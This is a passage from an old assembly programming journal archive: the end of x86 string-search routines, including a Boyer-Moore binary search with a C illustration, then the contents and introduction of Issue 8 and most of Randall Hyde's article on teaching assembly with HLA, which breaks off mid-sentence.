Calc_Suffix_Shift:
add ecx, shift_table[eax*4] ; add shift value to loop counter
sub ecx, edx ; sub pattern length
jns Pre_Compare
mov ecx, 1 ; minimum shift is 1
Pre_Compare:
add esi, ecx ; add suffix shift
mov ecx, edx ; reset counter for compare loop
Exit_Text:
cmp ebx, esi ; test exit condition
jl No_Match
xor eax, eax ; clear EAX for following partial writes
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
je @F
add esi, shift_table[eax*4]
jmp Exit_Text
@@:
dec ecx
xor eax, eax ; clear EAX for following partial writes
Cmp_Loop:
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
jne Calc_Suffix_Shift ; if not equal, get next shift
dec ecx
jns Cmp_Loop
jmp Match ; match on fall through
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Match:
sub esi, lpSource ; sub source from ESI
mov eax, esi ; put length in eax
jmp Cleanup
No_Match:
mov eax, -1
Cleanup:
pop edi
pop esi
pop ebx
ret
SBMBinSearch endp
; #########################################################################
end
********************************** END *************************************
Fastest Binary String Search Algorithm
by buliaNaza
; Fastest binary string search algo with
; PPlain and PMMX type of processors
; <c> 2001 by buliaNaza ;
; ;
.data? ;
align 4 ; !!!
skip_table DD 256 Dup(?) ; skip table
; ;
;...............................;
; Usage: esi ->pBuffer ; esi->buffer with bytes to be searched through
; ebp = lenBuffer ; ebp =length of the buffer
; ebx ->pSrchData ; ebx->pointer to data to be searched for
; edx = lenSrchData ; edx=length of data to be searched for
; edi ->pskip_table ; edi->pointer to skip table (must be aligned)
; call BMCaseSNext ;
;.................................;
.code ;
BMCaseSNext: ;
cmp edx, 4 ; edx = length of data to be searched for
jg Boyer_Moore ;
;... Brute Force Search ..........; for 4 digits or less only!
mov edi, [ebx] ; edi = dword of data to be searched for
mov ecx, 5 ;
sub ecx, edx ;
lea eax, [esi+edx-1] ; eax->new starting address in pBuffer
shl ecx, 3 ; *8
mov bl, [ebx+edx-1] ; get last byte only
mov bh, bl ; copy in bh
bswap edi ;
shr edi, cl ;
add ebp, esi ; ebp ->end of buffer
and ebx, 0FFFFh ; ebx = need the bx word only
mov ecx, ebx ;
mov esi, edx ; esi=edx = length of data to be searched for
shl ecx, 16 ;
test eax, 3 ;
lea ebx, [ebx+ecx] ;
jz Search_2 ;
Unalign_1: ;
cmp eax, ebp ; ebp ->end of buffer
jge Not_found ;
mov cl, [eax] ;
inc eax ;
cmp cl, bl ;
jz Compare_1 ;
Search_1: ;
test eax, 3 ;
jnz Unalign_1 ;
Search_2: ;
cmp eax, ebp ;u ebp ->end of buffer
jge Not_found ;v
mov ecx, [eax] ;u scasb for the last byte from pSrchData
add eax, 4 ;v
xor ecx, ebx ;u
mov edx, 7EFEFEFFh ;v
add edx, ecx ;u
xor ecx, -1 ;v
xor ecx, edx ;u
mov edx, [eax-4] ;v
and ecx, 81010100h ;u
jz Search_2 ;v
;
cmp dl, bl ;
jz Minus_4 ;
cmp dh, bl ;
jz Minus_3 ;
shr edx, 16 ;
cmp dl, bl ;
jz Minus_2 ;
cmp dh, bl ;
jz Compare_1 ;
jnz Search_2 ;
Minus_2: ;
dec eax ;
jnz Compare_1 ;
Minus_4: ;
sub eax, 3 ;
jnz Compare_1 ;
Minus_3: ;
sub eax, 2 ;
Compare_1: ;
mov edx, edi ;
cmp eax, ebp ; ebp ->end of buffer
jg Not_found ;
cmp esi, 1 ;
jz Found_1 ;
cmp dl, [eax-2] ; eax->pBuffer
jnz Search_1 ;
cmp esi, 2 ;
jz Found_1 ;
cmp dh, [eax-3] ; eax->pBuffer
jnz Search_1 ;
cmp esi, 3 ;
jz Found_1 ;
shr edx, 16 ;
mov cl, [eax-4] ; eax->pBuffer
cmp dl, cl ;
jnz Search_1 ;
Found_1: ;
sub eax, esi ; in eax->pointer to 1st
ret ; occurrence of data found in pBuffer
;...Boyer Moore Case Sens Next Search...;
Boyer_Moore: ;
add esi, ebp ; esi->pointer to the last byte of pBuffer
lea ebx, [ebx+edx-1] ; ebx->pointer to the last byte of pSrchData
neg edx ; edx= -lenSrchData
mov ecx, edx ; ecx = edx = -lenSrchData
add ebp, edx ; sub lenSrchData from lenBuffer
mov eax, 256 ; eax = counter
xor ebp, -1 ; not ebp->current negative index
MaxSkipLens: ;
mov [eax*4+edi-4], edx ; filling up the skip_table with -lenSrchData
mov [eax*4+edi-8], edx ;
mov [eax*4+edi-12], edx ;
mov [eax*4+edi-16], edx ;
mov [eax*4+edi-20], edx ;
mov [eax*4+edi-24], edx ;
mov [eax*4+edi-28], edx ;
mov [eax*4+edi-32], edx ;
mov [eax*4+edi-36], edx ;
mov [eax*4+edi-40], edx ;
mov [eax*4+edi-44], edx ;
mov [eax*4+edi-48], edx ;
mov [eax*4+edi-52], edx ;
mov [eax*4+edi-56], edx ;
mov [eax*4+edi-60], edx ;
mov [eax*4+edi-64], edx ;
mov [eax*4+edi-68], edx ;
mov [eax*4+edi-72], edx ;
mov [eax*4+edi-76], edx ;
mov [eax*4+edi-80], edx ;
mov [eax*4+edi-84], edx ;
mov [eax*4+edi-88], edx ;
mov [eax*4+edi-92], edx ;
mov [eax*4+edi-96], edx ;
mov [eax*4+edi-100], edx ;
mov [eax*4+edi-104], edx ;
mov [eax*4+edi-108], edx ;
mov [eax*4+edi-112], edx ;
mov [eax*4+edi-116], edx ;
mov [eax*4+edi-120], edx ;
mov [eax*4+edi-124], edx ;
mov [eax*4+edi-128], edx ;
sub eax, 32 ;
jne MaxSkipLens ; loop until eax = 0
SkipLens: ;
mov al, [ecx+ebx+1] ;u filling up with the real negative offset of
inc ecx ;v every byte from the pSrchData, starting from
mov [eax*4+edi], ecx ;u the last to the first, at the offset in
jne SkipLens ;v skip_table equal to the ASCII code of the
; byte, multiplied by 4
Search: ; the main searching loop-> FAST PART
mov al, [esi+ebp] ;u get a byte from pBuffer ->esi +ebp
mov ecx, edx ;v ecx=edx= -lenSrchData
sub ebp, [eax*4+edi] ;u sub negative offset for this byte from
; skip_table
jc Search ;v if dword ptr [eax*4+edi] AND ebp <> 0 loop
; again
lea ebp, [ebp+esi+1] ;u current negative index -> next byte (+1)
jge Not_found ;v end of pBuffer control (if ebp>=0 end)
; compare previous bytes from pSrchData (->ebx)
Compare: ; and current offset in pBuffer (->ebp)->SLOW
; PART
mov eax, [ebx+ecx+1] ; one dword from pSrchData -> ebx
inc ecx ; ecx = -lenSrchData
jz Found ; if ecx = 0 Found&Exit
cmp al, [ebp+ecx-1] ; ebp->pBuffer
jnz Not_equal ;
inc ecx ; ecx = -lenSrchData
jz Found ; if ecx = 0 Found&Exit
cmp ah, [ebp+ecx-1] ; ebp->pBuffer
jnz Not_equal ;
inc ecx ; ecx = -lenSrchData
jz Found ; if ecx=0 Found&Exit
shr eax, 16 ;
inc ecx ;
cmp al, [ebp+ecx-2] ; ebp->pBuffer
jnz Not_equal ;
test ecx, ecx ; ecx = -lenSrchData
jz Found ; if ecx=0 Found&Exit
cmp ah, [ebp+ecx-1] ; ebp->pBuffer
jz Compare ;
Not_equal: ;
sub eax, eax ; eax = 0
sub ebp, esi ; restore ebp->current negative index
jl Search ; end of pBuffer control
Not_found: ;
or eax, -1 ; Exit with flag Not_Found eax=-1
ret ;
Found: ;
lea eax, [ebp+edx] ; in eax->pointer to 1st
ret ; occurrence of data found in pBuffer
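The Search_2 loop in the listing above checks four buffer bytes at a time with the constants 7EFEFEFFh and 81010100h. A C sketch of that test follows. The function names are hypothetical, and the sketch only illustrates the bit trick, not the surrounding search. The quick test never misses a matching byte but it can misfire (for example when the top byte differs from the target only in its high bit), which is why the listing follows it with explicit byte comparisons.

```c
#include <assert.h>
#include <stdint.h>

/* Quick test: nonzero if some byte of word may equal b. */
int may_contain_byte(uint32_t word, uint8_t b)
{
    uint32_t x = word ^ (0x01010101u * b);  /* matching bytes become zero */
    uint32_t t = ((x + 0x7EFEFEFFu) ^ ~x) & 0x81010100u;
    return t != 0;
}

/* Exact test: the quick test rejects most words, then each byte is
   confirmed in the same way the listing does after its quick test. */
int contains_byte(uint32_t word, uint8_t b)
{
    if (!may_contain_byte(word, b))
        return 0;                           /* fast rejection */
    for (int i = 0; i < 4; i++) {
        if (((word >> (8 * i)) & 0xFFu) == b)
            return 1;
    }
    return 0;                               /* the quick test misfired */
}
```

In the listing the target byte is the last byte of the search data, replicated into all four bytes of EBX before the loop starts.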
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Mar 00-Aug 00
:::\_____\::::::::::. Issue 8
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.com asmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Teaching Assembly Language Using HLA"....................Randall.Hyde
"Processor Identification - Part II"..............Chris Dragan.&.Chili
"The LCC Intrinsics Utility"...............................Jacob.Navia
"Accessing COM Objects from Assembly"....................Ernest.Murphy
"64-bit Integer/ASCII Conversion"............................X-Calibre
Column: Win32 Assembly Programming
"Win32 AppFatalExit Skeleton"................................Chili
Column: The Unix World
"System Calls in FreeBSD".........................G.Adam.Stanislav
"Loadable Kernel Modules"..................................mammon_
Column: Gaming Corner
"Win32 ASM Game Programming"...........................Chris.Hobbs
Column: Assembly Language Snippets
"SEH.INC"................................................X-Calibre
"SEH.ASM"................................................X-Calibre
Column: Issue Solution
"BCD_Conv"...........................................Angel.Tsankov
----------------------------------------------------------------------
+++++++++++++++++++Issue Challenge++++++++++++++++++
Convert a two-digit BCD to hexadecimal
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
I cannot begin to count the number of subtle and overt hints I have received
that this issue is by far the most tardy APJ release to date. Quite a few
projects have conspired to steal my time away, from Linux essays to
disassembler coding to reverse engineering a hardware/software combo thrown
together by a madman bent on carrying the technology to his grave. Enough to
say, though, that the issue is finally ready for distribution. Not only that,
but I actually have about four articles left over --including Part II of the
ASM Gaming series-- to include in APJ 9.
The articles in this issue encompass a wide range of topics, from customizing
the LCC compiler to programming games in asm. Randall Hyde, who I'm sure needs
no introduction to assembly coders, has provided an excellent article
discussing the teaching of assembly language, and how he developed HLA to
assist. Chili has done a fair amount of work as well, working on everything
from CPU identification and exception handling to preparing an online gaming
article for ASCII publication.
X-Calibre has provided two complete programming packages, one for exception
handling and one for converting 64-bit integers; an introductory COM article
which further demystifies COM has been provided by Ernest Murphy. The Unix
camp is doubly represented this month, with an introduction to FreeBSD
assembly language [using NASM, of course] and my linux article deferred from
the previous issue. Capping everything off is a quick challenge and solution
provided by Angel Tsankov.
It has been suggested to me many times during the Time Of No Issues that I
should acquire a staff for ensuring that the issues get out on time. I am open
to suggestions in this area; anyone willing to volunteer their time on a
regular basis is welcome to contact me. Ideally, the mag should have a staff
that solicits articles [hint IRC hint], tests the code in each article, and
edits the articles to enforce formatting [80 col, 3sp tab] and commenting
standards. To date I've been doing the last one only, and as is readily
apparent I put it off as long as possible.
Another note, regarding mirrors. Translation of the APJ issues is perfectly
acceptable and highly encouraged; all I request is an email giving the URL so
I can link to it from the main page. I should point out that the individual
articles, once removed from the context of the APJ issue, are the property of
their individual authors, so contact them before 'repackaging'. Regarding
formatting, I have also received a few requests to reformat APJ in HTML or
another markup language to make reading and browsing easier. This I will not
do, for it makes APJ less portable and causes problems copying code from the
magazine to a source file. I have been working on syntax highlighting/tag
files for vi and nedit; I will post these and any user-contributed translation
files [e.g. APJ_to_HTML] on the main APJ website.
All pleading and excuses aside, issue 8 is now put to bed, and issue 9 will be
out faster than you can recite GNU's license agreement. Enjoy the mag...
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Teaching Assembly Language Using HLA
by Randall Hyde
I first began teaching assembly language programming at Cal Poly Pomona in the
Winter Quarter of 1987. I quickly discovered that good pedagogical material
was difficult to come by; even the textbooks available for the course left
something to be desired. As a result, my students were learning very little
assembly language in the ten weeks available to the course. After about two
quarters, I decided to do something about the textbook problem, so I began
writing a text I entitled "How to Program the IBM PC Using 8088 Assembly
Language" (obviously, this was back in the days when schools still used PCs
made by IBM and the main CPU you could always count on was the 8088). "How to
Program..." became the epitome of a "work in progress." Each quarter I would
get feedback from the students, update the text, and give it to Kinko's (and
the UCR Printing and Reprographics Department) to run off copies for my
students the very next quarter.
The original "How to Program..." text provided a basic set of library routines
to print strings, input characters and lines of text, and a few other basic
functions. This allowed the students to quickly begin writing programs without
having to learn about the INT instruction, DOS, or BIOS. However, I discovered
that students were spending a significant amount of time each quarter writing
their own numeric conversion routines, string manipulation routines, etc. One
student commented on "how much easier it was to program in 'C' than assembly
language since all those conversions and string operations were built into the
language." I replied that the real savings were due more to the 'C' standard
library than the language itself and that a comparable library for assembly
language programmers would make assembly language programming almost as easy
as 'C' programming. At that moment a little light went on in my head and I sat
down and wrote the first few routines of what ultimately became the "UCR
Standard Library for 80x86 Assembly Language Programmers" (You can still get a
copy of the UCR stdlib from webster at the URL given above). As I finished
each group of routines in the standard library, I incorporated them into my
courses. This reaped immediate benefits as students spent less time writing
numeric conversion routines and spent more time learning assembly language. My
students were getting into far more advanced topics than was possible before
the advent of the UCR Stdlib.
In the early 1990's, the 8088 CPU finally died off and IBM was no longer the
major supplier of PCs. Not only was it time to change the title of my text,
but I needed to update references to the 8088 (that were specific to that
chip) and bring the text into the world of the 80386 and 80486 processors. DOS
was still King and 16-bit code was still what everyone was writing, but issues
of optimization and the like were a little outdated in the text. In addition
to the changes reflecting the new Intel CPUs, I also incorporated the UCR
Standard Library into the text since it dramatically improved the speed at
which students progressed beyond the basic assembly programming skills. I
entitled the new version of the text "The Art of Assembly Language
Programming," an obvious knock-off of Knuth's series ("The Art of Computer
Programming").
In early 1996 it became obvious to me that DOS was finally dying and I needed
to modify "The Art of Assembly Language Programming" (AoA) to use Windows as
the development platform. I wasn't interested in having students write Windows
GUI applications in assembly language (the time spent teaching event-oriented
programming would interfere with the teaching of basic machine organization
and assembly language programming), but it was clear that the days of writing
code that arbitrarily pokes around in memory and accesses I/O addresses
directly (things that AoA taught) were nearly over. So I decided to get
started on a new version of AoA that used Windows as the basic development
environment with the emphasis on writing console applications. The UCR
Standard Library was the single most important pedagogical tool I'd discovered
that dramatically improved my students' progress. As I began work on a new
version of AoA for Windows 3.1 my first task was to improve upon the UCR
Standard Library to make it even easier to use, more flexible, more efficient,
and more "high level."
After six months of part time work I eventually gave up on the UCR Stdlib
v2.0. The idea was right; unfortunately the tools at my disposal
(specifically, MASM 6.11) weren't quite up to the task at hand. I was writing
some really tricky macros, obviously exploiting code inside MASM that
Microsoft's engineers had never run (i.e., I discovered lots of bugs). I would
code in some workarounds to the defects only to have the macro package break
at the next minor patch of MASM (e.g., from MASM 6.11a to MASM 6.11b). There
was also a robustness issue. Although MASM's macro capabilities are quite
powerful and it almost let me do everything I wanted, it was very easy to
confuse the macro package and then MASM would generate some totally weird (but
absolutely correct) diagnostic messages that correctly described what was
going wrong in the macro but made absolutely no sense whatsoever to a
beginning assembly language student who was using the macro to print some data
to the console device. As it became clear that the UCR Stdlib v2.0 would never
be robust enough for student use, I decided to take a different approach.
About this time, I was talking with my Department Chair about the assembly
language course. We were identifying some of the problems that students had
learning assembly language. One problem, of course, was the paradigm shift -
learning to solve problems using machine language rather than a high level
language. The second problem we identified is that students get to apply very
little of what they've learned from other courses to the assembly language
class. A third problem was the primitive tools available to assembly language
programmers. Energized by this discussion, I decided to see how I could solve
these problems and improve the educational process.
Problem one, the paradigm shift, had to be handled carefully. After all, the
whole purpose of having students take an assembly language programming course
in the first place is to acquaint them with the low-level operation of the
machine. However, I felt it was certainly possible to redefine parts of
assembly language so that it would be more familiar to students. For example,
one might test the carry flag after an addition to determine if an unsigned
overflow has occurred using code like the following:
        add eax, 5
        jnc NoOverflow
        << code to execute if overflow occurs >>
NoOverflow:
Although this code is fairly straight-forward, you would be surprised how many
students cannot visualize this code on their own. On the other hand, if you
feed them some pseudo code like:
        add eax, 5
        if( the carry flag is set ) then
                << code to execute if overflow occurs >>
        endif
those same students won't have any problems understanding this code. To
take
advantage of this difference in perspective, I decided to explore changing
the
definition of assembly language to allow the use of the "if condition then
do
something" paradigm rather than the "if a condition is false them skip over
something" paradigm. Fundamentally, this does not change the material the
student has to learn; it just presents it from a different point of view to
which they're already accustomed. This certainly wasn't a gigantic leap
away
from assembly language as it existed in 1996. After all, MASM and other
assemblers were already allowing statements like ".if" and ".endif" in the
code. So I tried these statements out on a few of my students. What I
discovered is that the students picked up the basic "high level" syntax very
rapidly. Once they mastered the high level syntax, they were able to learn
the
low-level syntax (i.e., using conditional jumps) faster than ever before.
What
I discovered is something that Nicoderm CQ is pushing for their smoking
cessation program: "learning assembly language in graduated steps (from high
level to low level) is easier than going about it 'cold turkey.'"
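For readers who want to poke at the carry-flag test from the example above, here is a minimal sketch in Python rather than assembly. It only models the arithmetic: the name add32 and the 32-bit mask are illustrative assumptions, not part of HLA or MASM.

```python
MASK32 = 0xFFFFFFFF  # width of EAX

def add32(a, b):
    """Model a 32-bit unsigned ADD and return (result, carry_flag)."""
    total = (a & MASK32) + (b & MASK32)
    return total & MASK32, total > MASK32

# The "if condition then do something" form of the test.
result, carry = add32(0xFFFFFFFE, 5)
if carry:
    overflowed = True    # << code to execute if overflow occurs >>
else:
    overflowed = False
```

The low-level "jnc NoOverflow" form is the same test with the sense inverted: it skips the body when the carry flag is clear.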
The second problem, students not being able to leverage their programming
skills from other classes, is largely linked to the syntax of Intel x86
assembly language. Many skills students pick up, such as programming style,
indentation, appropriate programming construct selection, etc., are useless in
a typical assembly language class. Even skills like commenting and choosing
good variable names are slightly different in assembly language programs.
As a
result, students spend considerable (unproductive) time learning the new
"rules
of the game" when writing assembly language programs. This directly equates
to
less progress over the ten week quarter. Ideally, students should be able to
apply knowledge like program style, commenting style, algorithm
organization, and control construct selection they learned in a C/C++ or Pascal
course to their assembly language programs. If they could, they'd be "up and
writing" in assembly language much faster than before.
The third problem with teaching assembly language is the primitive state of
the
tools. While MASM provides a wonderful set of high level language control
constructs, very little else about MASM supports this "brave new world" of
assembly language I want to teach. For example, MASM's variable
declarations
leave a lot to be desired (the syntax is straight out of the 1960's). As I
noted earlier, as powerful as MASM's macro facilities are, they weren't
sufficient to develop a robust library package for my students. I briefly
looked at TASM, but its "ideal" mode fared little better than MASM.
Likewise,
while development environments for high level languages have been improving
by
leaps and bounds (e.g., Delphi and C++ Builder), assembly language
programmers
are still using the same crude command line tools popularized in the early
1970's. Codeview, which is practically useless under Windows, is the most
advanced tool Microsoft provides specifically for assembly language
programmers.
Faced with these problems, I decided the first order of business was to
create
a new x86 assembly language and write a compiler for it. I decided to give
this language the somewhat-less-than-original name of "the High Level
Assembler," or HLA (IBM and Motorola both already have assemblers that use a
variant of this name). It took three years, but the first version of HLA
was
ready for public consumption in September of 1999.
I began using HLA in my CS 61 course (machine organization and assembly
language programming) at UCR in the Fall Quarter, 1999. With no pedagogical
material other than a roughly written reference guide to the language, I was
expecting a complete disaster. It turns out that I was pleasantly
surprised.
Although the students did have major problems, the course went far more
smoothly than I anticipated and we managed to cover about the same material
I
normally covered when using MASM.
Although things were going far better than I expected, this is not to say
that
things were going great, or even as smoothly as I would have liked. The
major
problem, of course, was the lack of a textbook. The only material the
students
had to study from were their lecture notes. Clearly something needed to be
done about this. Of course, the whole reason for spending three years
writing
HLA was to allow me to write a new version of AoA. So in November, 1999, I
began work on the new edition of the text. By the start of the Winter Quarter
in January, 2000, I had roughed together five chapters; about 50% of the
material was brand new, and the other 50% was cut, pasted, and updated from the
older version of the text. During the quarter I rushed out two more
chapters
bringing the total to seven. The Winter Quarter went far more smoothly than
the Fall Quarter. Student projects were much better and the progress of the
class outstripped any assembly language course I'd taught prior to that
point.
Clearly the class was benefiting from the use of HLA.
By the start of the Spring Quarter in April, 2000, I'd managed to make one
proofreading pass over the first six chapters and I'd written the first
draft
of the eighth chapter. With a bit of luck, I will have the first draft of
the
text ready by the end of Summer, 2000. At that time I intend to "shop" the
text around to a set of publishers so other schools can benefit from the
work.
Well, this has been a long-winded report of HLA's justification. You're
probably wondering what HLA is and whether it is applicable to you
(especially
if you're a programmer rather than an educator). Fair enough, the rest of
this
article will discuss the HLA system and how you would use it.
HLA is technically a compiler, not an assembler. HLA v1.x converts an HLA
source file into a MASM-compatible assembly language source file. This MASM
file is then assembled and linked to produce a Win32 executable file. The
HLA
compiler automatically runs the assembler and linker, so these steps are
transparent to the HLA user (other than the few extra seconds it takes to
assemble and link the output file). This whole process takes only a few
seconds (for example, compiling, assembling, and linking the 750-line
"x2p.hla"
program in the HLA examples directory only takes about two seconds on a 266
MHz
Pentium II system with UW SCSI drives). I am planning to emit object code
directly in version 2.0 of HLA. Until then, an HLA user will need
Microsoft's
MASM and linker. For those who would prefer to have HLA generate code for
TASM, NASM, or some other assembler, the HLA compiler source code is
available,
have fun :-).
HLA is a Win32 console application and it generates Win32 applications. By
default, it generates console applications although it does not restrict you
to
writing console applications under Windows. There is absolutely no support
for
DOS applications. While it is possible to write Linux applications with
only
minor changes to HLA, the development process for Linux applications is
convoluted and hardly worthwhile. HLA v2.0 will address portability across
32-bit x86 operating systems. For now, using HLA is practical only under
Win32
OSes (Win 95, 98, NT, and 2000).
When designing the HLA language, I chose a syntax that is very similar to
common imperative high level languages like Pascal/Delphi, Ada, Modula-2,
FORTRAN77, C/C++, and Java. That is not to say that HLA compiles Pascal
programs, but rather, a Pascal programmer will note many similarities
between
Pascal and HLA (and ditto for the other languages). HLA stole many of the
ideas for data declarations from the Algol based languages (Pascal,
Modula-2,
and Ada), it grabbed the ideas for many of its control structures from
FORTRAN77, Ada, and C/C++/Java, and the structure of the HLA Standard
Library
is based on the C Standard Library. So regardless of which high level
language
you're most comfortable with in this set, you'll certainly recognize some
elements of your favorite HLL in HLA.
A carefully written HLA program will look almost exactly like a high level
language program. Consider the following sample program:
program SampleHLApgm;
#include( "stdlib.hhf" )
const
HelloWorld := "Hello World";
begin SampleHLApgm;
stdout.put( "The classical 'Hello World' program: ", HelloWorld, nl );
end SampleHLApgm;
This program does the obvious thing. Anyone with any high level language
background can probably figure out everything except the purpose of "nl"
(which
is the newline string imported by the standard library). This certainly
doesn't look like an assembly language program; there isn't even a real
machine instruction in sight. Of course, this is a trivial example;
nonetheless, I've managed to write reasonable HLA programs that were just
over
1,000 lines of code that contained only one or two identifiable machine
language instructions. If it's possible to do this, how can I get away with
calling HLA an assembly language?
The truth is, you can actually write a very similar looking program with
MASM.
Here's an example I trot out for unbelievers. This code is compilable with
MASM (assuming you include the UCR Standard Library v2.0 and some additional
code I've cut out for brevity):
var
enum colors,<red,green,blue>
colors c1, c2
endvar
Main proc
mov ax, dseg
mov ds, ax
mov es, ax
MemInit
InitExcept
EnableExcept
finit
try
cout "Enter two colors:"
cin c1, c2
cout "You entered ",c1," and ",c2,nl
.if c1 == red
cout "c1 was red"
.endif
except $Conversion
cout "Conversion error occurred",nl
except $Overflow
cout "Overflow error occurred",nl
endtry
CleanUpEx
ExitPgm ;DOS macro to quit program.
Main endp
As you can see, the only identifiable machine instructions here are the ones
that initialize the segment registers at the beginning of the program (which
is
unnecessary in a Win32 environment). So let me blunt criticism from
"die-hard"
assembly fans right at the start: HLA doesn't open up all kinds of new
programming paradigms that weren't possible before. With some really clever
macros (e.g., enum, cout, and cin in the MASM code), it is quite possible to
do
some really amazing things. If you're wondering why you should bother with
HLA
if MASM is so wonderful, don't forget my comments about the robustness of
these
macros. Both HLA and MASM (with the UCR Standard Library v2.0) work great
as
long as you write perfect code and don't make any mistakes. However, if you
do
make mistakes, the MASM macro scheme gets ugly real quick.
The "die-hard" assembly fan will probably make the observation that they
would
never write code like the MASM code I've presented above; they would write
traditional assembly code. They want to write traditional code. They don't
want this high level syntax forced upon them. Well, HLA doesn't force you
to
use high level control structures rather than machine instructions. You can
always write the low level code if you prefer it that way. Here is the
original HLA program rewritten to use familiar machine instructions:
program SampleHLApgm2;
#include( "stdlib.hhf" )
data
dword 37, 37;
TcHWpStr: dword;
byte "The classical 'Hello World' program: ",0,0,0;
dword 11, 11;
HWstr: dword;
byte "Hello World",0;
begin SampleHLApgm2;
lea( eax, TcHWpStr );
push( eax );
call stdout.puts;
lea( eax, HWstr );
push( eax );
call stdout.puts;
call stdout.newln;
end SampleHLApgm2;
The stdout.puts and stdout.newln procedures come from the HLA Standard
Library.
I will leave it up to the interested reader to translate these into Win API
Write calls if this code isn't sufficiently low level to satisfy. Note that
HLA strings are not simple zero terminated strings like C/C++. This
explains
the extra zeros and dword values in the DATA section (the dword values hold
the
string lengths; I offer these without further explanation, see the HLA
documentation for more details on HLA's string format).
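The data layout in the listing above can be mimicked with a few lines of Python. This is only a sketch under stated assumptions: the article says the two dwords hold string lengths, and I am assuming the first is the maximum length and the second the current length, with the character data zero terminated and padded to a dword multiple. The function name hla_string_image is made up for illustration.

```python
import struct

def hla_string_image(text, max_len=None):
    """Build the bytes of an HLA-style string and return (image, pointer_offset).

    Assumed layout: dword max length, dword current length, then the
    characters, a zero terminator, and zero padding to a multiple of 4.
    """
    data = text.encode("ascii")
    if max_len is None:
        max_len = len(data)
    body = data + b"\x00"                 # zero terminator
    body += b"\x00" * (-len(body) % 4)    # pad to a dword boundary
    header = struct.pack("<II", max_len, len(data))
    return header + body, len(header)     # the string label sits after the header

image, ptr_offset = hla_string_image("Hello World")
```

Under these assumptions the 37-character prompt string needs three zero bytes after it and "Hello World" needs one, which matches the byte directives in the listing.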
One thing you've probably noticed from this second example is that HLA uses
a
functional notation for assembly language statements. That is, the
instruction
mnemonics look like function calls in a high level language and the operands
look like parameters to those functions. The neat thing about this notation
is
that it easily allows the use of "instruction composition." Instruction
composition, like functional composition, means that you get to use one
instruction as the operand of another. For example, an instruction like
"mov(
mov( 0, eax ), ebx );" is perfectly legal in HLA. The HLA compiler will
compile the innermost instruction first and then substitute the destination
operand of the innermost instruction for the operand position occupied by
the
instruction. HLA's MOV instruction takes the generic form "MOV( source,
destination );" so the former instruction translates to the following two
instruction sequence:
mov( 0, eax ); // intel syntax: mov eax, 0
mov( eax, ebx ); // intel syntax: mov ebx, eax
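The substitution rule just described is easy to model. The following Python sketch is an illustration only, not HLA's actual parser: it assumes every instruction "returns" its last (destination) operand, and it does not handle operands that themselves contain parentheses, such as "(type dword [esp])". The names split_args and expand are hypothetical.

```python
def split_args(text):
    """Split an operand list on commas that are not inside parentheses."""
    args, depth, current = [], 0, ""
    for ch in text:
        if ch == "," and depth == 0:
            args.append(current.strip())
            current = ""
        else:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            current += ch
    if current.strip():
        args.append(current.strip())
    return args

def expand(instr):
    """Return (flat instruction list, operand substituted for this instruction)."""
    instr = instr.strip().rstrip(";").strip()
    if "(" not in instr:
        return [], instr                  # plain operand, nothing to emit
    name, rest = instr.split("(", 1)
    emitted, operands = [], []
    for arg in split_args(rest[:rest.rindex(")")]):
        inner, value = expand(arg)        # innermost instructions come first
        emitted += inner
        operands.append(value)
    emitted.append(f"{name.strip()}( {', '.join(operands)} );")
    return emitted, (operands[-1] if operands else "")

flat, _ = expand("mov( mov( 0, eax ), ebx );")
```

Here flat holds the same two-instruction sequence as the hand translation above.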
In and of itself, instruction composition is somewhat interesting, but
programmers striving to write readable code need to exercise caution when
using
instruction composition. It is real easy to write some really unreadable
code
if you abuse instruction composition. E.g., consider:
mov( add( mov( 0, eax ), sub( ebx, ecx)), edx ), mov( i, esi ));
Egads! What does this mess do? Some might consider the inclusion of
instruction composition in HLA to be a fault of the language if it allows
you
to write such unreadable code. However, I've never felt it was the language
syntax's job to enforce good programming style. If there's really a reason
for
writing such messy code, the compiler shouldn't prevent it.
Although you can produce some truly unreadable messes with instruction
composition, if you use it properly it can enhance the readability of your
programs. For example, HLA lets you associate an arbitrary string with a
procedure that HLA will substitute for that procedure name when the
procedure
call appears as an operand of another instruction. Most functions that
return
a value in a register specify that register name as their "returns" string
(the
string HLA substitutes for the procedure call). For example, the "str.eq(
str1, str2)" function compares the two string operands and returns true or
false in AL depending on the result of the comparison. This allows you to
write code like the following:
if( str.eq( str1, "Hello" )) then
stdout.put( "str1 = 'Hello'" nl );
endif;
HLA directly translates the IF statement into the following sequence:
str.eq( str1, "Hello" );
if( al ) then
stdout.put( "str1 = 'Hello'" nl );
endif;
(If a register name appears where a boolean expression is expected, as AL
does
in the IF statement above, HLA emits a TEST instruction to see if the
register
contains a non-zero value.)
Arguably, the former version is a little more readable than the latter
version.
Instruction composition, when you use it in this fashion, lets you write
code
that "looks" a little more high level without the compiler having to
generate
lots of extra code (as it would if HLA supported a generalized arithmetic
expression parser).
Like MASM, HLA supports a wide variety of high level control structures.
HLA's
set is both higher level and lower level at the same time. There are two
reasons HLA's control structures aren't always as powerful as MASM's.
First,
with the sole exception of object method invocations, I made a rule that
HLA's
high level control structures would not modify any general purpose registers
behind the programmer's back. MASM, for example, may modify the value in
EAX
for certain boolean expressions it must compute. Second, remember that the
primary goal of HLA is to teach assembly language; yes, it's supposed to
ease
the learning curve, but still the goal is to teach assembly language. It is
possible to get carried away with the high level language features and then
wind up with an "assembler" that lets students write their assembly language
programs in a high level language. In my opinion, MASM went too far with
what
